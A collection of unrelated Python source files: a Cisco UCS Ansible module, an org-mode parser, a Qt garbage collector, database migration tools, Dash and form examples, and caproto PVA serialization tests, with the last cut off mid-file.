- If C(present), will verify that the storage profile is present and will create if needed.
- If C(absent), will verify that the storage profile is absent and will delete if needed.
choices: [ absent, present ]
default: present
name:
description:
- The name of the storage profile.
- This name can be between 1 and 16 alphanumeric characters.
- "You cannot use spaces or any special characters other than - (hyphen), \"_\" (underscore), : (colon), and . (period)."
- You cannot change this name after profile is created.
required: yes
description:
description:
- The user-defined description of the storage profile.
- Enter up to 256 characters.
- "You can use any characters or spaces except the following:"
- "` (accent mark), \ (backslash), ^ (carat), \" (double quote), = (equal sign), > (greater than), < (less than), or ' (single quote)."
aliases: [ descr ]
local_luns:
description:
- List of Local LUNs used by the storage profile.
suboptions:
name:
description:
- The name of the local LUN.
required: yes
size:
description:
- Size of this LUN in GB.
- The size can range from 1 to 10240 GB.
default: '1'
auto_deploy:
description:
- Whether the local LUN should be automatically deployed or not.
choices: [ auto-deploy, no-auto-deploy ]
default: auto-deploy
expand_to_avail:
description:
- Specifies that this LUN can be expanded to use the entire available disk group.
- For each service profile, only one LUN can use this option.
- Expand To Available option is not supported for already deployed LUN.
type: bool
default: 'no'
fractional_size:
description:
- Fractional size of this LUN in MB.
default: '0'
disk_policy_name:
description:
- The disk group configuration policy to be applied to this local LUN.
state:
description:
- If C(present), will verify local LUN is present on profile.
If C(absent), will verify local LUN is absent on profile.
choices: [ absent, present ]
default: present
org_dn:
description:
- The distinguished name (dn) of the organization where the resource is assigned.
default: org-root
requirements:
- ucsmsdk
author:
- Sindhu Sudhir (@sisudhir)
- David Soper (@dsoper2)
- CiscoUcs (@CiscoUcs)
version_added: '2.7'
'''
EXAMPLES = r'''
- name: Configure Storage Profile
ucs_storage_profile:
hostname: 172.16.143.150
username: admin
password: password
name: DEE-StgProf
local_luns:
- name: Boot-LUN
size: '60'
disk_policy_name: DEE-DG
- name: Data-LUN
size: '200'
disk_policy_name: DEE-DG
- name: Remove Storage Profile
ucs_storage_profile:
hostname: 172.16.143.150
username: admin
password: password
name: DEE-StgProf
state: absent
- name: Remove Local LUN from Storage Profile
ucs_storage_profile:
hostname: 172.16.143.150
username: admin
password: password
name: DEE-StgProf
local_luns:
- name: Data-LUN
state: absent
'''
RETURN = r'''
#
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.remote_management.ucs import UCSModule, ucs_argument_spec
def main():
local_lun = dict(
name=dict(type='str', required=True),
state=dict(type='str', default='present', choices=['present', 'absent']),
size=dict(type='str', default='1'),
auto_deploy=dict(type='str', default='auto-deploy', choices=['auto-deploy', 'no-auto-deploy']),
expand_to_avail=dict(type='str', default='no', choices=['no', 'yes']),
fractional_size=dict(type='str', default='0'),
disk_policy_name=dict(type='str', default=''),
)
argument_spec = ucs_argument_spec
argument_spec.update(
org_dn=dict(type='str', default='org-root'),
name=dict(type='str', required=True),
description=dict(type='str', aliases=['descr'], default=''),
local_luns=dict(type='list', elements='dict', options=local_lun),
state=dict(type='str', default='present', choices=['present', 'absent']),
)
module = AnsibleModule(
argument_spec,
supports_check_mode=True,
)
ucs = UCSModule(module)
err = False
# UCSModule creation above verifies ucsmsdk is present and exits on failure. Additional imports are done below.
from ucsmsdk.mometa.lstorage.LstorageProfile import LstorageProfile
from ucsmsdk.mometa.lstorage.LstorageDasScsiLun import LstorageDasScsiLun
ucs.result['changed'] = False
try:
mo_exists = False
props_match = False
# dn is <org_dn>/profile-<name>
dn = module.params['org_dn'] + '/profile-' + module.params['name']
mo = ucs.login_handle.query_dn(dn)
if mo:
mo_exists = True
if module.params['state'] == 'absent':
# mo must exist but all properties do not have to match
if mo_exists:
if not module.check_mode:
ucs.login_handle.remove_mo(mo)
ucs.login_handle.commit()
ucs.result['changed'] = True
else:
if mo_exists:
# check top-level mo props
kwargs = dict(descr=module.params['description'])
if mo.check_prop_match(**kwargs):
# top-level props match, check next level mo/props
if not module.params.get('local_luns'):
props_match = True
else:
# check local lun props
for lun in module.params['local_luns']:
child_dn = dn + '/das-scsi-lun-' + lun['name']
mo_1 = ucs.login_handle.query_dn(child_dn)
if lun['state'] == 'absent':
if mo_1:
props_match = False
break
else:
if mo_1:
kwargs = dict(size=str(lun['size']))
kwargs['auto_deploy'] = lun['auto_deploy']
kwargs['expand_to_avail'] = lun['expand_to_avail']
kwargs['fractional_size'] = str(lun['fractional_size'])
kwargs['local_disk_policy_name'] = lun['disk_policy_name']
if mo_1.check_prop_match(**kwargs):
props_match = True
else:
props_match = False
break
if not props_match:
if not module.check_mode:
# create if mo does not already exist
mo = LstorageProfile(
parent_mo_or_dn=module.params['org_dn'],
name=module.params['name'],
descr=module.params['description'],
)
if module.params.get('local_luns'):
for lun in module.params['local_luns']:
if lun['state'] == 'absent':
child_dn = dn + '/das-scsi-lun-' + lun['name']
mo_1 = ucs.login_handle.query_dn(child_dn)
ucs.login_handle.remove_mo(mo_1)
else:
mo_1 = LstorageDasScsiLun(
parent_mo_or_dn=mo,
name=lun['name'],
size=str(lun['size']),
auto_deploy=lun['auto_deploy'],
expand_to_avail=lun['expand_to_avail'],
fractional_size=str(lun['fractional_size']),
local_disk_policy_name=lun['disk_policy_name'],
)
ucs.login_handle.add_mo(mo, True)
ucs.login_handle.commit()
ucs.result['changed'] = True
except Exception as e:
err = True
ucs.result['msg'] = "setup error: %s " % str(e)
if err:
module.fail_json(**ucs.result)
module.exit_json(**ucs.result)
if __name__ == '__main__':
main()
|
# Copyright Contributors to the OpenCue Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Custom garbage collector class.
Disables automatic garbage collection and instead collect manually every INTERVAL milliseconds.
This is done to ensure that garbage collection only happens in the GUI thread, as otherwise Qt
can crash."""
import gc
from PySide2 import QtCore
class GarbageCollector(QtCore.QObject):
"""Custom garbage collector class.
Disables automatic garbage collection and instead collect manually every INTERVAL milliseconds.
This is done to ensure that garbage collection only happens in the GUI thread, as otherwise Qt
can crash."""
INTERVAL = 5000
def __init__(self, parent, debug=False):
QtCore.QObject.__init__(self, parent)
self.debug = debug
self.timer = QtCore.QTimer(self)
self.timer.timeout.connect(self.check) # pylint: disable=no-member
self.threshold = gc.get_threshold()
gc.disable()
self.timer.start(self.INTERVAL)
def check(self):
"""Runs the garbage collector.
This method is run every INTERNAL seconds."""
gc.collect()
if self.debug:
for obj in gc.garbage:
print(obj, repr(obj), type(obj))
|
import pytest
from aio_forms import ERROR_REQUIRED, LengthValidator, StringField
from tests.fields.utils import FIELD_KEY, do_common
pytestmark = pytest.mark.asyncio
async def test_common():
await do_common(
field_cls=StringField,
default=' Test default ',
default_new=' Test default new ',
has_validators=True,
has_filters=True,
has_required=True,
)
def test():
label = 'Test Label'
field = StringField(key=FIELD_KEY, label=lambda: label)
assert field.schema() == dict(
key=FIELD_KEY,
type='string',
input_type='text',
value=None,
label=label,
)
async def test_length_validator():
field_1 = StringField(key=FIELD_KEY, required=True)
assert field_1.error is None
assert await field_1.validate(None) is False
assert field_1.error == ERROR_REQUIRED
field_2 = StringField(key=FIELD_KEY, required=False)
assert field_2.error is None
assert await field_2.validate(None) is True
assert field_2.error is None
field_3 = StringField(key=FIELD_KEY, validators=(LengthValidator(min=5, max=10),))
assert await field_3.validate(None) is True # ok, because not required
field_4 = StringField(
key=FIELD_KEY,
validators=(LengthValidator(min=5, max=10),),
required=True,
)
assert await field_4.validate(None) is False # required, but empty
field_4.set_value('1' * 5)
assert await field_4.validate(None) is True # ok, 5-symbols text
field_4.set_value('1' * 15)
assert await field_4.validate(None) is False # error, too big
field_4.set_value('1' * 7)
assert await field_4.validate(None) is True # ok, 7-symbols text
def test_filters():
default = 'Some text. Another text. '
field = StringField(
key=FIELD_KEY,
default=default,
filters=(
lambda x: x.lower(),
lambda x: x.replace('a', 'b'),
),
)
assert field.value == default.strip().lower().replace('a', 'b')
|
from sklearn import metrics
import numpy as np
def get_fpr_tpr_ths(y_param, scores_param):
"""
Returns fpr, tpr, thresholds.
Positive label is +.
"""
y = np.array(y_param)
scores = np.array(scores_param)
fpr, tpr, thresholds = metrics.roc_curve(y, scores, pos_label='+')
return fpr, tpr, thresholds
|
# Copyright (c) 2010 Charles Cave
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use, copy,
# modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Program written by Charles Cave (charlesweb@optusnet.com.au)
# February - March 2009
# Version 2 - June 2009
# Added support for all tags, TODO priority and checking existence of a tag
# More information at
# http://members.optusnet.com.au/~charles57/GTD
"""
The Orgnode module consists of the Orgnode class for representing a
headline and associated text from an org-mode file, and routines for
constructing data structures of these classes.
"""
import re, sys
import datetime
def makelist(filename):
"""
Read an org-mode file and return a list of Orgnode objects
created from this file.
"""
ctr = 0
try:
f = open(filename, 'r')
except IOError:
print "Unable to open file [%s] " % filename
print "Program terminating."
sys.exit(1)
todos = dict() # populated from #+SEQ_TODO line
todos['TODO'] = '' # default values
todos['DONE'] = '' # default values
level = 0
heading = ""
bodytext = ""
tag1 = "" # The first tag enclosed in ::
alltags = [] # list of all tags in headline
sched_date = ''
deadline_date = ''
nodelist = []
propdict = dict()
for line in f:
ctr += 1
hdng = re.search('^(\*+)\s(.*?)\s*$', line)
if hdng:
if heading: # we are processing a heading line
thisNode = Orgnode(level, heading, bodytext, tag1, alltags)
if sched_date:
thisNode.setScheduled(sched_date)
sched_date = ""
if deadline_date:
thisNode.setDeadline(deadline_date)
deadline_date = ''
thisNode.setProperties(propdict)
nodelist.append( thisNode )
propdict = dict()
level = hdng.group(1)
heading = hdng.group(2)
bodytext = ""
tag1 = ""
alltags = [] # list of all tags in headline
tagsrch = re.search('(.*?)\s*:(.*?):(.*?)$',heading)
if tagsrch:
heading = tagsrch.group(1)
tag1 = tagsrch.group(2)
alltags.append(tag1)
tag2 = tagsrch.group(3)
if tag2:
for t in tag2.split(':'):
if t != '': alltags.append(t)
else: # we are processing a non-heading line
if line[:10] == '#+SEQ_TODO':
kwlist = re.findall('([A-Z]+)\(', line)
for kw in kwlist: todos[kw] = ""
if line[:1] != '#':
bodytext = bodytext + line
if re.search(':PROPERTIES:', line): continue
if re.search(':END:', line): continue
prop_srch = re.search('^\s*:(.*?):\s*(.*?)\s*$', line)
if prop_srch:
propdict[prop_srch.group(1)] = prop_srch.group(2)
continue
sd_re = re.search('SCHEDULED:\s+<([0-9]+)\-([0-9]+)\-([0-9]+)', line)
if sd_re:
sched_date = datetime.date(int(sd_re.group(1)),
int(sd_re.group(2)),
int(sd_re.group(3)) )
dd_re = re.search('DEADLINE:\s*<(\d+)\-(\d+)\-(\d+)', line)
if dd_re:
deadline_date = datetime.date(int(dd_re.group(1)),
int(dd_re.group(2)),
int(dd_re.group(3)) )
# write out last node
thisNode = Orgnode(level, heading, bodytext, tag1, alltags)
thisNode.setProperties(propdict)
if sched_date:
thisNode.setScheduled(sched_date)
if deadline_date:
thisNode.setDeadline(deadline_date)
nodelist.append( thisNode )
# using the list of TODO keywords found in the file
# process the headings searching for TODO keywords
for n in nodelist:
h = n.Heading()
todoSrch = re.search('([A-Z]+)\s(.*?)$', h)
if todoSrch:
if todos.has_key( todoSrch.group(1) ):
n.setHeading( todoSrch.group(2) )
n.setTodo ( todoSrch.group(1) )
prtysrch = re.search('^\[\#(A|B|C)\] (.*?)$', n.Heading())
if prtysrch:
n.setPriority(prtysrch.group(1))
n.setHeading(prtysrch.group(2))
return nodelist
######################
class Orgnode(object):
"""
Orgnode class represents a headline, tags and text associated
with the headline.
"""
def __init__(self, level, headline, body, tag, alltags):
"""
Create an Orgnode object given the parameters of level (as the
raw asterisks), headline text (including the TODO tag), and
first tag. The makelist routine postprocesses the list to
identify TODO tags and updates headline and todo fields.
"""
self.level = len(level)
self.headline = headline
self.body = body
self.tag = tag # The first tag in the list
self.tags = dict() # All tags in the headline
self.todo = ""
self.prty = "" # empty of A, B or C
self.scheduled = "" # Scheduled date
self.deadline = "" # Deadline date
self.properties = dict()
for t in alltags:
self.tags[t] = ''
# Look for priority in headline and transfer to prty field
def Heading(self):
"""
Return the Heading text of the node without the TODO tag
"""
return self.headline
def setHeading(self, newhdng):
"""
Change the heading to the supplied string
"""
self.headline = newhdng
def Body(self):
"""
Returns all lines of text of the body of this node except the
Property Drawer
"""
return self.body
def Level(self):
"""
Returns an integer corresponding to the level of the node.
Top level (one asterisk) has a level of 1.
"""
return self.level
def Priority(self):
"""
Returns the priority of this headline: 'A', 'B', 'C' or empty
string if priority has not been set.
"""
return self.prty
def setPriority(self, newprty):
"""
Change the value of the priority of this headline.
Values values are '', 'A', 'B', 'C'
"""
self.prty = newprty
def Tag(self):
"""
Returns the value of the first tag.
For example, :HOME:COMPUTER: would return HOME
"""
return self.tag
def Tags(self):
"""
Returns a list of all tags
For example, :HOME:COMPUTER: would return ['HOME', 'COMPUTER']
"""
return self.tags.keys()
def hasTag(self, srch):
"""
Returns True if the supplied tag is present in this headline
For example, hasTag('COMPUTER') on headling containing
:HOME:COMPUTER: would return True.
"""
return self.tags.has_key(srch)
def setTag(self, newtag):
"""
Change the value of the first tag to the supplied string
"""
self.tag = newtag
def setTags(self, taglist):
"""
Store all the tags found in the headline. The first tag will
also be stored as if the setTag method was called.
"""
for t in taglist:
self.tags[t] = ''
def Todo(self):
"""
Return the value of the TODO tag
"""
return self.todo
def setTodo(self, value):
"""
Set the value of the TODO tag to the supplied string
"""
self.todo = value
def setProperties(self, dictval):
"""
Sets all properties using the supplied dictionary of
name/value pairs
"""
self.properties = dictval
def Property(self, keyval):
"""
Returns the value of the requested property or null if the
property does not exist.
"""
return self.properties.get(keyval, "")
def setScheduled(self, dateval):
"""
Set the scheduled date using the supplied date object
"""
self.scheduled = dateval
def Scheduled(self):
"""
Return the scheduled date object or null if nonexistent
"""
return self.scheduled
def setDeadline(self, dateval):
"""
Set the deadline (due) date using the supplied date object
"""
self.deadline = dateval
def Deadline(self):
"""
Return the deadline date object or null if nonexistent
"""
return self.deadline
def __repr__(self):
"""
Print the level, heading text and tag of a node and the body
text as used to construct the node.
"""
# This method is not completed yet.
n = ''
for i in range(0, self.level):
n = n + '*'
n = n + ' ' + self.todo + ' '
if self.prty:
n = n + '[#' + self.prty + '] '
n = n + self.headline
n = "%-60s " % n # hack - tags will start in column 62
closecolon = ''
for t in self.tags.keys():
n = n + ':' + t
closecolon = ':'
n = n + closecolon
# Need to output Scheduled Date, Deadline Date, property tags The
# following will output the text used to construct the object
n = n + "\n" + self.body
return n
|
import multiprocessing # python's version of openMP
import math
from random import uniform
num_of_procs = 1 # can be used for testing number of processes
num_of_points = int(1000000/num_of_procs) # the original amount of points in 4.22 divided by number of processes
points_in_circle = 0
x_points = []
y_points = []
def distance(x, y):
return math.sqrt((x - 0)**2 + (y - 0)**2)
def random_point():
global points_in_circle
global num_of_procs
# print(multiprocessing.current_process().name) # prints the name of the process
for i in range(num_of_points):
dist = 0
x_points.append(uniform(-1, 1)) # generates random float numbers
y_points.append(uniform(-1, 1))
dist = distance(x_points[i], y_points[i])
if dist < 1:
points_in_circle += 1
def calculate_pi():
global num_of_points
global points_in_circle
print("pi =", (4*points_in_circle)/(num_of_points*num_of_procs))
if __name__ == "__main__":
jobs = []
for j in range(0, num_of_procs): # used to create multiple processes
process = multiprocessing.Process(target=random_point())
jobs.append(process)
for k in jobs:
k.start()
for k in jobs:
k.join()
calculate_pi()
|
# import commands
import subprocess
import os
main = "./testmain"
if os.path.exists(main):
# rc, out = commands.getstatusoutput(main)
(rc, out) = subprocess.getstatusoutput(main)
print ('rc = %d, \nout = %s' % (rc, out))
print ('*'*10)
f = os.popen(main)
data = f.readlines()
f.close()
print (data)
print ('*'*10)
os.system(main) |
import dash_bootstrap_components as dbc
from dash import Input, Output, State, html
alert = html.Div(
[
dbc.Button(
"Toggle alert with fade",
id="alert-toggle-fade",
className="me-1",
n_clicks=0,
),
dbc.Button(
"Toggle alert without fade", id="alert-toggle-no-fade", n_clicks=0
),
html.Hr(),
dbc.Alert(
"Hello! I am an alert",
id="alert-fade",
dismissable=True,
is_open=True,
),
dbc.Alert(
"Hello! I am an alert that doesn't fade in or out",
id="alert-no-fade",
dismissable=True,
fade=False,
is_open=True,
),
]
)
@app.callback(
Output("alert-fade", "is_open"),
[Input("alert-toggle-fade", "n_clicks")],
[State("alert-fade", "is_open")],
)
def toggle_alert(n, is_open):
if n:
return not is_open
return is_open
@app.callback(
Output("alert-no-fade", "is_open"),
[Input("alert-toggle-no-fade", "n_clicks")],
[State("alert-no-fade", "is_open")],
)
def toggle_alert_no_fade(n, is_open):
if n:
return not is_open
return is_open
|
#!venv/bin/python
# -*- encoding: utf-8 -*-
import sys
import os.path
sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath('..'))
from migrate.versioning import api
from config import SQLALCHEMY_DATABASE_URI
from config import SQLALCHEMY_MIGRATE_REPO
from app import db, models
def create():
from app import db
db.create_all()
if not os.path.exists(SQLALCHEMY_MIGRATE_REPO):
api.create(SQLALCHEMY_MIGRATE_REPO, 'database repository')
api.version_control(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
else:
api.version_control(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO,
api.version(SQLALCHEMY_MIGRATE_REPO))
def migrate():
import imp
from app import db
v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
migration = SQLALCHEMY_MIGRATE_REPO + \
('/versions/%03d_migration.py' % (v+1))
tmp_module = imp.new_module('old_model')
old_model = api.create_model(SQLALCHEMY_DATABASE_URI,
SQLALCHEMY_MIGRATE_REPO)
exec(old_model, tmp_module.__dict__)
script = api.make_update_script_for_model(SQLALCHEMY_DATABASE_URI,
SQLALCHEMY_MIGRATE_REPO,
tmp_module.meta, db.metadata)
open(migration, "wt").write(script)
api.upgrade(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
print('New migration saved as {}'.format(migration))
print('Current database version: {}'.format(str(v)))
def upgrade():
api.upgrade(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
print('Current database version: {}'.format(str(v)))
def downgrade():
v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
api.downgrade(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO, v - 1)
v = api.db_version(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
print('Current database version: {}'.format(str(v)))
def clean():
for u in models.User.query.all():
db.session.delete(u)
db.session.commit()
if __name__ == '__main__':
import argparse
desc = """A set of database tools for building web apps using python
and SQLAlchemy.
"""
parser = argparse.ArgumentParser(description=desc)
options = parser.add_mutually_exclusive_group()
options.add_argument('--create', action="store_true",
help="Create a new db")
options.add_argument('--migrate', action="store_true",
help="Migrate db with new changes")
options.add_argument('--upgrade', action="store_true",
help="Upgrade db to newer version")
options.add_argument('--downgrade', action="store_true",
help="Downgrade db to older version")
options.add_argument('--clean', action="store_true",
help="Delete all data in db")
args = parser.parse_args()
if args.create:
create()
elif args.migrate:
migrate()
elif args.upgrade:
upgrade()
elif args.downgrade:
downgrade()
elif args.clean:
clean()
else:
print("$ python db_tools.py --help")
|
import binascii
import logging
import textwrap
import typing
from array import array
from typing import List, Union
import pytest
from numpy.testing import assert_array_almost_equal
pytest.importorskip('caproto.pva')
from caproto import pva
from caproto.pva._fields import FieldArrayType, FieldType
logger = logging.getLogger(__name__)
def _fromhex(s):
s = ''.join(s.strip().split('\n'))
s = s.replace(' ', '')
return binascii.unhexlify(s)
def round_trip(obj, endian, **kwargs):
serialized = b''.join(obj.serialize(endian=endian, **kwargs))
round_tripped, _, consumed = type(obj).deserialize(serialized,
endian=endian, **kwargs)
assert consumed == len(serialized)
return round_tripped, serialized
def round_trip_value(cls, value, endian, **kwargs):
serialized = b''.join(cls.serialize(value, endian=endian, **kwargs))
round_tripped, _, consumed = cls.deserialize(serialized, endian=endian,
**kwargs)
assert consumed == len(serialized)
return round_tripped, serialized
@pytest.mark.parametrize(
'endian', [pytest.param(pva.LITTLE_ENDIAN, id='LE'),
pytest.param(pva.BIG_ENDIAN, id='BE')]
)
@pytest.mark.parametrize(
'value, expected_length',
[(None, 1),
(0, 1),
(255, 1 + 4),
(256, 1 + 4),
(int(2 ** 31 - 2), 1 + 4),
(int(2 ** 32), 1 + 4 + 8),
(int(2 ** 63), 1 + 4 + 8),
(pva.MAX_INT32, 1 + 4 + 8)
]
)
def test_size_roundtrip(endian, value, expected_length):
roundtrip_value, serialized = round_trip_value(pva.Size, value, endian=endian)
assert len(serialized) == expected_length
assert value == roundtrip_value
print(serialized, value)
@pytest.mark.parametrize(
'endian', [pytest.param(pva.LITTLE_ENDIAN, id='LE'),
pytest.param(pva.BIG_ENDIAN, id='BE')]
)
def test_status_utilities(endian):
assert pva.Status.create_success().status == pva.StatusType.OK
err = pva.Status.create_error(message='test', call_tree='test2')
assert err.status == pva.StatusType.ERROR
assert err.message == 'test'
assert err.call_tree == 'test2'
rt_err, _ = round_trip(err, endian=endian)
assert err.message == rt_err.message
assert err.call_tree == rt_err.call_tree
assert err.status == rt_err.status
def test_status_example():
status_example = _fromhex(
"FF010A4C6F77206D656D6F727900022A4661696C656420746F20"
"6765742C2064756520746F20756E657870656374656420657863"
"657074696F6EDB6A6176612E6C616E672E52756E74696D654578"
"63657074696F6E0A096174206F72672E65706963732E63612E63"
"6C69656E742E6578616D706C652E53657269616C697A6174696F"
"6E4578616D706C65732E7374617475734578616D706C65732853"
"657269616C697A6174696F6E4578616D706C65732E6A6176613A"
"313138290A096174206F72672E65706963732E63612E636C6965"
"6E742E6578616D706C652E53657269616C697A6174696F6E4578"
"616D706C65732E6D61696E2853657269616C697A6174696F6E45"
"78616D706C65732E6A6176613A313236290A"
)
buf = bytearray(status_example)
print('\n- status 1')
status, buf, consumed = pva.Status.deserialize(buf, endian=pva.BIG_ENDIAN)
assert status.status == pva.StatusType.OK
assert consumed == 1
print('\n- status 2')
status, buf, consumed = pva.Status.deserialize(buf, endian=pva.BIG_ENDIAN)
assert status.status == pva.StatusType.WARNING
assert consumed == 13
print('\n- status 3')
status, buf, consumed = pva.Status.deserialize(buf, endian=pva.BIG_ENDIAN)
assert status.status == pva.StatusType.ERROR
assert consumed == 264
@pytest.mark.parametrize(
"data, expected",
[
pytest.param(
_fromhex(
"FD0001800B74696D655374616D705F74" # .... .tim eSta mp_t
"03107365636F6E64735061737445706F" # ..se cond sPas tEpo
"6368230B6E616E6F5365636F6E647322" # ch#. nano Seco nds"
"077573657254616722" # .use rTag "
),
textwrap.dedent('''
struct timeStamp_t
int64 secondsPastEpoch
int32 nanoSeconds
int32 userTag
'''.rstrip()),
id='example1'
),
pytest.param(
_fromhex(
"FD000180106578616D706C6553747275" # .... .exa mple Stru
"6374757265070576616C75652810626F" # ctur e..v alue ..bo
"756E64656453697A6541727261793010" # unde dSiz eArr ay0.
"0E666978656453697A65417272617938" # .fix edSi zeAr ray8
"040974696D655374616D70FD00028006" # ..ti meSt amp. ....
"74696D655F7403107365636F6E647350" # time _t.. seco ndsP
"61737445706F6368230B6E616E6F7365" # astE poch #.na nose
"636F6E64732207757365725461672205" # cond s".u serT ag".
"616C61726DFD00038007616C61726D5F" # alar m... ..al arm_
"74030873657665726974792206737461" # t..s ever ity" .sta
"74757322076D657373616765600A7661" # tus" .mes sage `.va
"6C7565556E696F6EFD00048100030B73" # lueU nion .... ...s
"7472696E6756616C75656008696E7456" # trin gVal ue`. intV
"616C7565220B646F75626C6556616C75" # alue ".do uble Valu
"65430C76617269616E74556E696F6EFD" # eC.v aria ntUn ion.
"000582" # ...
),
textwrap.dedent('''
struct exampleStructure
byte[1] value
byte<16> boundedSizeArray
byte[4] fixedSizeArray
struct timeStamp
int64 secondsPastEpoch
int32 nanoseconds
int32 userTag
struct alarm
int32 severity
int32 status
string message
union valueUnion
string stringValue
int32 intValue
float64 doubleValue
any variantUnion
'''.rstrip()),
id='example2'
),
]
)
def test_fielddesc_examples(data, expected):
cache = pva.CacheContext()
info, buf, offset = pva.FieldDesc.deserialize(data, endian='<', cache=cache)
print(info.summary() == expected)
@pva.pva_dataclass
class my_struct:
value: List[pva.Int8]
boundedSizeArray: pva.array_of(pva.Int8,
array_type=FieldArrayType.bounded_array,
size=16)
fixedSizeArray: pva.array_of(pva.Int8,
array_type=FieldArrayType.fixed_array,
size=4)
@pva.pva_dataclass
class timeStamp_t:
secondsPastEpoch: pva.Int64
nanoSeconds: pva.UInt32
userTag: pva.UInt32
timeStamp: timeStamp_t
@pva.pva_dataclass
class alarm_t:
severity: pva.Int32
status: pva.Int32
message: str
alarm: alarm_t
valueUnion: Union[str, pva.UInt32]
variantUnion: typing.Any
repr_with_data = [
pytest.param(
# textwrap.dedent('''\
# struct my_struct
# int8[] value
# int8<16> boundedSizeArray
# int8[4] fixedSizeArray
# struct timeStamp_t timeStamp
# int64 secondsPastEpoch
# uint32 nanoSeconds
# uint32 userTag
# struct alarm_t alarm
# int32 severity
# int32 status
# string message
# union valueUnion
# string String
# uint32 Uint32
# any variantUnion
# '''.strip()),
my_struct,
{
'value': [1, 2, 3],
'boundedSizeArray': [4, 5, 6, 7, 8],
'fixedSizeArray': [9, 10, 11, 12],
'timeStamp': {
'secondsPastEpoch': 0x1122334455667788,
'nanoSeconds': 0xAABBCCDD,
'userTag': 0xEEEEEEEE,
},
'alarm': {
'severity': 0x11111111,
'status': 0x22222222,
'message': "Allo, Allo!",
},
'valueUnion': {
'str': None,
'UInt32': 0x33333333,
},
'variantUnion': "String inside variant union.",
},
# TODO_DOCS: example is strictly speaking incorrect, the value 0xAABBCCDD
# will not fit in an int32, so changed to uint for now
# NOTE: selector added as 'value' after union
(_fromhex('03010203' '05040506' '0708090A' '0B0C1122' # .... .... .... ..."
'33445566' '7788AABB' 'CCDDEEEE' 'EEEE1111' # 3DUf w... .... ....
'11112222' '22220B41' '6C6C6F2C' '20416C6C' # .."" "".A llo, All
'6F210133' '33333360' '1C537472' '696E6720' # o!.3 333` .Str ing
'696E7369' '64652076' '61726961' '6E742075' # insi de v aria nt u
'6E696F6E' '2E')), # nion .
pva.BIG_ENDIAN,
id='first_test'
),
]
@pytest.mark.parametrize("struct, structured_data, expected_serialized, endian",
repr_with_data)
def test_serialize(struct, structured_data, expected_serialized, endian):
field = struct._pva_struct_
print(field.summary())
cache = pva.CacheContext()
serialized = pva.to_wire(field, value=structured_data, endian=endian)
serialized = b''.join(serialized)
assert serialized == expected_serialized
result, buf, offset = pva.from_wire(
field, serialized, cache=cache, endian=endian, bitset=None)
for key, value in result.items():
if isinstance(value, array):
result[key] = value.tolist()
assert result == structured_data
@pytest.mark.parametrize(
"field_type, value, array_type",
[(FieldType.int64, 1, FieldArrayType.scalar),
(FieldType.int64, [1, 2, 3], FieldArrayType.variable_array),
(FieldType.boolean, True, FieldArrayType.scalar),
(FieldType.boolean, [True, True, False], FieldArrayType.variable_array),
(FieldType.float64, 1.0, FieldArrayType.scalar),
(FieldType.float64, [2.0, 2.0, 3.0], FieldArrayType.variable_array),
(FieldType.float64, array('d', [2.0, 2.0, 3.0]), FieldArrayType.variable_array),
(FieldType.string, 'abcdefghi', FieldArrayType.scalar),
(FieldType.string, ['abc', 'def'], FieldArrayType.variable_array),
]
)
def test_variant_types_and_serialization(field_type, value, array_type):
fd = pva.FieldDesc(name='test', field_type=field_type,
array_type=array_type, size=1)
cache = pva.CacheContext()
for endian in (pva.LITTLE_ENDIAN, pva.BIG_ENDIAN):
serialized = pva.to_wire(fd, value=value, cache=cache, endian=endian)
serialized = b''.join(serialized)
print(field_type, value, '->', serialized)
res = pva.from_wire(fd, data=serialized, cache=cache, endian=endian)
deserialized, buf, offset = res
assert len(buf) == 0
assert offset == len(serialized)
if field_type.name == 'string':
assert deserialized == value
else:
assert_array_almost_equal(deserialized, value)
bitsets = [
(set(),
_fromhex('00')),
({0},
_fromhex('01 01')),
({1},
_fromhex('01 02')),
({7},
_fromhex('01 80')),
({8},
_fromhex('02 00 01')),
({15},
_fromhex('02 00 80')),
({55},
_fromhex('07 00 00 00 00 00 00 80')),
({56},
_fromhex('08 00 00 00 00 00 00 00 01')),
({63},
_fromhex('08 00 00 00 00 00 00 00 80')),
({64},
_fromhex('09 00 00 00 00 00 00 00 00 01')),
({65},
_fromhex('09 00 00 00 00 00 00 00 00 02')),
